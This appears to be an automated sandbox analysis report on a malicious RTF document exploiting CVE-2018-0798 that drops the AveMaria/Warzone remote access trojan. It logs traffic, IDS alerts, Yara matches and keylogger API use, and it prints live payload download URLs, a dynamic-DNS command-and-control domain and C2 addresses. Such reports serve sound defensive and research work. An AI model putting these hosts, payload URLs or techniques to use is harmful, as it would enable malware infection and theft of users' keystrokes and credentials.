Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 144.76.136.153:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 144.76.136.153:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 144.76.136.153:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 144.76.136.153:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 144.76.136.153:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 144.76.136.153:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 144.76.136.153:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 144.76.136.153:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 144.76.136.153:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 144.76.136.153:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 144.76.136.153:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 144.76.136.153:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 144.76.136.153:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 144.76.136.153:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 144.76.136.153:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 144.76.136.153:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 144.76.136.153:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 144.76.136.153:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 144.76.136.153:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 144.76.136.153:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 144.76.136.153:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 144.76.136.153:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 144.76.136.153:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 144.76.136.153:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 144.76.136.153:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 144.76.136.153:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 144.76.136.153:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 144.76.136.153:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 45.137.65.132:7410
Source: global traffic	TCP traffic: 45.137.65.132:7410 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 45.137.65.132:7410
Source: global traffic	TCP traffic: 45.137.65.132:7410 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 45.137.65.132:7410
Source: global traffic	TCP traffic: 45.137.65.132:7410 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 45.137.65.132:7410
Source: global traffic	TCP traffic: 45.137.65.132:7410 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 45.137.65.132:7410 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 45.137.65.132:7410
Source: global traffic	TCP traffic: 45.137.65.132:7410 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 45.137.65.132:7410 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 45.137.65.132:7410
Source: global traffic	TCP traffic: 45.137.65.132:7410 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 45.137.65.132:7410 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 45.137.65.132:7410
Source: global traffic	TCP traffic: 45.137.65.132:7410 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 45.137.65.132:7410 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 45.137.65.132:7410
Source: global traffic	TCP traffic: 45.137.65.132:7410 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 45.137.65.132:7410 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 45.137.65.132:7410
Source: global traffic	TCP traffic: 45.137.65.132:7410 -> 192.168.2.22:49173

Source: global traffic	DNS query: name: transfer.sh
Source: global traffic	DNS query: name: mcmac.duckdns.org

Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 144.76.136.153:80

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2852326 ETPRO TROJAN Ave Maria/Warzone RAT InitializePacket 45.137.65.132:7410 -> 192.168.2.22:49173
Source: Traffic	Snort IDS: 2036735 ET TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin (Inbound) 45.137.65.132:7410 -> 192.168.2.22:49173
Source: Traffic	Snort IDS: 2852327 ETPRO TROJAN Ave Maria/Warzone RAT BeaconResponse 192.168.2.22:49173 -> 45.137.65.132:7410
Source: Traffic	Snort IDS: 2036734 ET TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin 192.168.2.22:49173 -> 45.137.65.132:7410
Source: Traffic	Snort IDS: 2852329 ETPRO TROJAN Ave Maria/Warzone RAT PingCommand 45.137.65.132:7410 -> 192.168.2.22:49173
Source: Traffic	Snort IDS: 2852328 ETPRO TROJAN Ave Maria/Warzone RAT PingResponse 192.168.2.22:49173 -> 45.137.65.132:7410

Uses dynamic DNS services

Source: unknown

DNS query: name: mcmac.duckdns.org

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: mcmac.duckdns.org

Source: Joe Sandbox View

JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Source: global traffic	HTTP traffic detected: GET /get/8LtEmv/mwele.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: transfer.sh
Source: global traffic	HTTP traffic detected: GET /get/8LtEmv/mwele.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: transfer.shConnection: Keep-Alive

Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe

Code function: 8_2_0040264B URLDownloadToFileW,ShellExecuteW,

8_2_0040264B

Source: Joe Sandbox View

ASN Name: ON-LINE-DATAServerlocation-NetherlandsDrontenNL ON-LINE-DATAServerlocation-NetherlandsDrontenNL

Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe

Code function: 8_2_0040A50C GetCurrentDirectoryW,InternetCheckConnectionW,GetTempPathW,GetTempPathW,lstrcatW,lstrcatW,GetTempPathW,lstrcatW,GetTempPathW,lstrcatW,GetTempPathW,lstrcatW,GetTempPathW,lstrcatW,GetTempPathW,lstrcatW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,SetCurrentDirectoryW,PathFileExistsW,PathFileExistsW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,SetCurrentDirectoryW,

8_2_0040A50C

Source: Joe Sandbox View	IP Address: 144.76.136.153 144.76.136.153
Source: Joe Sandbox View	IP Address: 144.76.136.153 144.76.136.153

Source: global traffic

TCP traffic: 192.168.2.22:49173 -> 45.137.65.132:7410

Source: gnwnekc.exe	String found in binary or memory: http://5.206.225.104/dll/freebl3.dll
Source: gnwnekc.exe	String found in binary or memory: http://5.206.225.104/dll/mozglue.dll
Source: gnwnekc.exe	String found in binary or memory: http://5.206.225.104/dll/msvcp140.dll
Source: gnwnekc.exe	String found in binary or memory: http://5.206.225.104/dll/nss3.dll
Source: gnwnekc.exe	String found in binary or memory: http://5.206.225.104/dll/softokn3.dll
Source: gnwnekc.exe	String found in binary or memory: http://5.206.225.104/dll/vcruntime140.dll
Source: EQNEDT32.EXE, 00000002.00000002.904836936.0000000000610000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: EQNEDT32.EXE, 00000002.00000002.904836936.0000000000610000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: EQNEDT32.EXE, 00000002.00000002.904836936.0000000000610000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: EQNEDT32.EXE, 00000002.00000002.904836936.0000000000610000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: EQNEDT32.EXE, 00000002.00000002.904836936.0000000000610000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: EQNEDT32.EXE, 00000002.00000002.904836936.0000000000610000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: word.exe, 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmp, word.exe, 00000005.00000000.901874794.000000000040A000.00000008.00000001.01000000.00000004.sdmp, mwele[1].exe.2.dr, word.exe.2.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: EQNEDT32.EXE, 00000002.00000002.904836936.0000000000610000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: EQNEDT32.EXE, 00000002.00000002.904836936.0000000000610000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: EQNEDT32.EXE, 00000002.00000002.904836936.0000000000610000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: EQNEDT32.EXE, 00000002.00000002.904836936.0000000000610000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: EQNEDT32.EXE, 00000002.00000002.904836936.0000000000610000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: EQNEDT32.EXE, 00000002.00000002.904836936.0000000000610000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: EQNEDT32.EXE, 00000002.00000002.904836936.0000000000610000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: EQNEDT32.EXE, 00000002.00000002.904802354.00000000005EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://transfer.sh/get/8LtEm
Source: EQNEDT32.EXE	String found in binary or memory: http://transfer.sh/get/8LtEmv/mwele.exe
Source: EQNEDT32.EXE, 00000002.00000002.904708429.000000000058F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://transfer.sh/get/8LtEmv/mwele.exe4
Source: EQNEDT32.EXE, 00000002.00000002.904708429.000000000058F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://transfer.sh/get/8LtEmv/mwele.exeO
Source: EQNEDT32.EXE, 00000002.00000002.904708429.000000000058F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://transfer.sh/get/8LtEmv/mwele.exej
Source: EQNEDT32.EXE, 00000002.00000002.904836936.0000000000610000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: EQNEDT32.EXE, 00000002.00000002.904836936.0000000000610000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: gnwnekc.exe	String found in binary or memory: http://www.google.com
Source: gnwnekc.exe, 00000006.00000002.914184912.0000000000420000.00000004.00001000.00020000.00000000.sdmp, gnwnekc.exe, 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, gnwnekc.exe, 00000008.00000003.913528927.00000000008D7000.00000004.00000020.00020000.00000000.sdmp, gnwnekc.exe, 00000008.00000000.911229292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, gnwnekc.exe, 00000008.00000003.913211098.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, gnwnekc.exe, 00000008.00000003.913357063.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, gnwnekc.exe, 00000008.00000003.913236124.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, gnwnekc.exe, 00000008.00000003.913377903.00000000008D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.google.comhttp://5.206.225.104/dll/softokn3.dllhttp://5.206.225.104/dll/msvcp140.dllhttp:
Source: EQNEDT32.EXE, 00000002.00000002.904836936.0000000000610000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: EQNEDT32.EXE, 00000002.00000002.904802354.00000000005EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://transfer.sh/
Source: EQNEDT32.EXE, 00000002.00000002.904802354.00000000005EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://transfer.sh/3
Source: EQNEDT32.EXE, 00000002.00000002.904789219.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.904836936.0000000000610000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://transfer.sh/get/8LtEmv/mwele.exe
Source: EQNEDT32.EXE, 00000002.00000002.904789219.00000000005E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://transfer.sh/get/8LtEmv/mwele.exeip

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E4BB335C-7968-4117-8D4F-5D55A2B81155}.tmp

Jump to behavior

Source: unknown

DNS traffic detected: queries for: transfer.sh

Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe

Code function: 8_2_004050CC setsockopt,recv,

8_2_004050CC

Source: global traffic	HTTP traffic detected: GET /get/8LtEmv/mwele.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: transfer.sh
Source: global traffic	HTTP traffic detected: GET /get/8LtEmv/mwele.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: transfer.shConnection: Keep-Alive

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown	Network traffic detected: HTTP traffic on port 49172 -> 443

Source: EQNEDT32.EXE, 00000002.00000002.904708429.000000000058F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.904708429.000000000058F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: EQNEDT32.EXE, 00000002.00000002.904836936.0000000000610000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: unknown

HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.22:49172 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe

Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\gnwnekc.exe

Jump to behavior

Contains functionality to register a low level keyboard hook

Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe

Code function: 8_2_00407376 SetWindowsHookExA 0000000D,004074C0,00000000,00000000

8_2_00407376

Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe

Code function: 8_2_004074D5 GetAsyncKeyState,wsprintfW,GetAsyncKeyState,wsprintfW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetKeyNameTextW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,CallNextHookEx,

8_2_004074D5

Source: C:\Users\user\AppData\Roaming\word.exe

Code function: 5_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

5_2_00405809

Source: gnwnekc.exe, 00000006.00000002.914184912.0000000000420000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: GetRawInputData

E-Banking Fraud

Yara detected AveMaria stealer

Source: Yara match	File source: 8.3.gnwnekc.exe.8d6540.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.gnwnekc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.gnwnekc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.gnwnekc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.gnwnekc.exe.8d4cd0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.gnwnekc.exe.8d4cd0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.gnwnekc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.gnwnekc.exe.8d6540.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.gnwnekc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.gnwnekc.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.gnwnekc.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.gnwnekc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.gnwnekc.exe.420000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.gnwnekc.exe.420000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.gnwnekc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.913528927.00000000008D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.911229292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.913357063.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.913211098.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.913236124.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.913377903.00000000008D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.914184912.0000000000420000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: gnwnekc.exe PID: 508, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: gnwnekc.exe PID: 2052, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: SecuriteInfo.com.Exploit.CVE-2018-0798.4.16955.24932.rtf, type: SAMPLE	Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: 8.3.gnwnekc.exe.8d6540.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 8.3.gnwnekc.exe.8d6540.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 8.3.gnwnekc.exe.8d6540.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 8.3.gnwnekc.exe.8d6540.5.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 8.2.gnwnekc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 8.2.gnwnekc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 8.2.gnwnekc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 8.2.gnwnekc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 8.2.gnwnekc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 8.2.gnwnekc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 8.2.gnwnekc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 8.2.gnwnekc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 8.0.gnwnekc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 8.3.gnwnekc.exe.8d4cd0.2.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
